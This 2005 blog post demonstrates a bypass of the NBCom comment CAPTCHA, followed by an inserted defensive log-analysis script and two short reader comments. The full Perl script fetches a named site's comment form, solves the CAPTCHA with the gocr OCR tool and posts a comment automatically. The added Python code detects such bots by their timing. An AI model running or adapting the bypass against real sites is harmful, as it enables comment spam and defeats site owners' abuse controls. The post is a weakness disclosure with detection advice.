
Fun with NBCom

2005/12/15 filed under /nanoblogger

For a while now, you have been able to use NBCom (NanoBlogger Comments) on your blog to handle comments on posts.

While my (slightly altered) CGIComments way of handling comments does not prevent bots from posting, NBCom gives you the impression that it does, by presenting a shiny CAPTCHA image.

This, of course, is tempting to break. And yes, it's really, really easy to bypass. Let's look at some code:

#!/usr/bin/perl

use strict;             # Always use strict
use warnings;           # ... and warnings
use WWW::Mechanize;     # magic module ;-)

# Setup WWW::Mechanize (with a user agent that announces what we are)
my $m = WWW::Mechanize->new(
   agent => "B10m Anti-Bot Bot",
);

# Retrieve the first page: the NBCom comment form for one article
$m->get('http://nhw.pl/blg/cmt.php?article=/2005/11/22/T01_13_46/index.html');

# Find, download and store the CAPTCHA image (served by img.php)
my $img = $m->find_image(url_regex => qr/img\.php/)
   or die "No CAPTCHA image found on the comment form\n";
$m->get($img->url, ":content_file" => 'image.png');

# Go back to the form
$m->back;

# Use `gocr` to find the very secret code
my $secret = `/usr/local/bin/gocr image.png`;
chomp($secret);

# Get rid of the image
unlink 'image.png';

# Submit the form; 'body' is the comment text, 'txt' the CAPTCHA answer
$m->submit_form(
   form_number  => 1,
   fields       => {
      body      => 'Ugh, bots can still post :-( See '.
                   'http://menno.b10m.net/blog/archives/2005/12/15/T16_20_20/index.html',
      txt       => $secret,
   },
);

All set. The script contains almost more comments (to make it readable for everyone) than code, and sure as heck, it seems to work: the CAPTCHA image is clean enough for gocr, an off-the-shelf OCR tool, to read it without any preprocessing.

I guess the author needs to rethink his CAPTCHA strategy here. It's too easy!

(NOTE: Of course, a script like jcwren's A little fun with merlyn is way nicer, but hey, I'm just lazy ;-)
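If you run NBCom yourself and want to know whether something like the script above is hitting your comment form, the access log already tells you: the bot fetches cmt.php, fetches img.php and POSTs the solved form within a couple of seconds, while a human needs far longer to read the image and type a comment. The following is an added example, not code from the original post or from NBCom. It assumes the common Apache/nginx "combined" log format and the cmt.php/img.php paths seen above; the log lines are constructed for the example and are not real traffic.

```python
"""Flag comment POSTs that follow the CAPTCHA image fetch suspiciously fast.

Added example (not from the original post or NBCom). Assumes "combined"
access-log format and NBCom's cmt.php / img.php paths.
"""
import re
from datetime import datetime

# One "combined" log line: ip ident user [ts] "METHOD path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample log (not real traffic). First three lines: the bot's
# form -> image -> POST sequence, one second apart. Last three: a human who
# takes about a minute and a half between seeing the image and posting.
SAMPLE_LOG = """\
203.0.113.7 - - [15/Dec/2005:16:20:20 +0100] "GET /blg/cmt.php?article=/2005/11/22/T01_13_46/index.html HTTP/1.1" 200 1532 "-" "B10m Anti-Bot Bot"
203.0.113.7 - - [15/Dec/2005:16:20:21 +0100] "GET /blg/img.php HTTP/1.1" 200 2048 "http://nhw.pl/blg/cmt.php" "B10m Anti-Bot Bot"
203.0.113.7 - - [15/Dec/2005:16:20:22 +0100] "POST /blg/cmt.php HTTP/1.1" 302 0 "http://nhw.pl/blg/cmt.php" "B10m Anti-Bot Bot"
198.51.100.4 - - [15/Dec/2005:16:25:02 +0100] "GET /blg/cmt.php?article=/2005/11/22/T01_13_46/index.html HTTP/1.1" 200 1532 "-" "Mozilla/5.0 (X11; Linux) Firefox/1.5"
198.51.100.4 - - [15/Dec/2005:16:25:03 +0100] "GET /blg/img.php HTTP/1.1" 200 2048 "http://nhw.pl/blg/cmt.php" "Mozilla/5.0 (X11; Linux) Firefox/1.5"
198.51.100.4 - - [15/Dec/2005:16:26:40 +0100] "POST /blg/cmt.php HTTP/1.1" 302 0 "http://nhw.pl/blg/cmt.php" "Mozilla/5.0 (X11; Linux) Firefox/1.5"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["path"] = rec["path"].split("?", 1)[0]  # drop the query string
    return rec


def find_fast_captcha_posts(log_text, max_seconds=10):
    """Return one record per comment POST that either never fetched the CAPTCHA
    image or POSTed within max_seconds of fetching it.

    The timing is the useful signal: the post's script advertises itself in the
    User-Agent, but a real spammer would send a browser User-Agent instead.
    """
    last_image = {}   # ip -> time of the most recent img.php fetch
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] == "GET" and rec["path"].endswith("/img.php"):
            last_image[rec["ip"]] = rec["time"]
        elif rec["method"] == "POST" and rec["path"].endswith("/cmt.php"):
            fetched = last_image.get(rec["ip"])
            if fetched is None:
                hits.append({"ip": rec["ip"], "ua": rec["ua"], "elapsed": None,
                             "reason": "posted without fetching the CAPTCHA image"})
                continue
            elapsed = (rec["time"] - fetched).total_seconds()
            if elapsed <= max_seconds:
                hits.append({"ip": rec["ip"], "ua": rec["ua"], "elapsed": elapsed,
                             "reason": "solved CAPTCHA in %.0fs" % elapsed})
    return hits


if __name__ == "__main__":
    for hit in find_fast_captcha_posts(SAMPLE_LOG):
        print("%s  %-40s  %s" % (hit["ip"], hit["ua"], hit["reason"]))
```

Run against the sample, only the 203.0.113.7 sequence is reported (image fetched and form posted one second later); the human at 198.51.100.4 needed 97 seconds and passes. The threshold is a judgement call: a few seconds catches an OCR-driven script like the one above, while a human who pastes a prepared comment can still be faster than you expect, so treat a hit as something to rate-limit or hold for moderation rather than reject outright.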

Posted by: B10m | permanent link | comments (2)

Comments

djktr wrote at 2005-12-16 22:36:

udtk

Someone wrote at 2006-08-29 08:49:

Ouch!
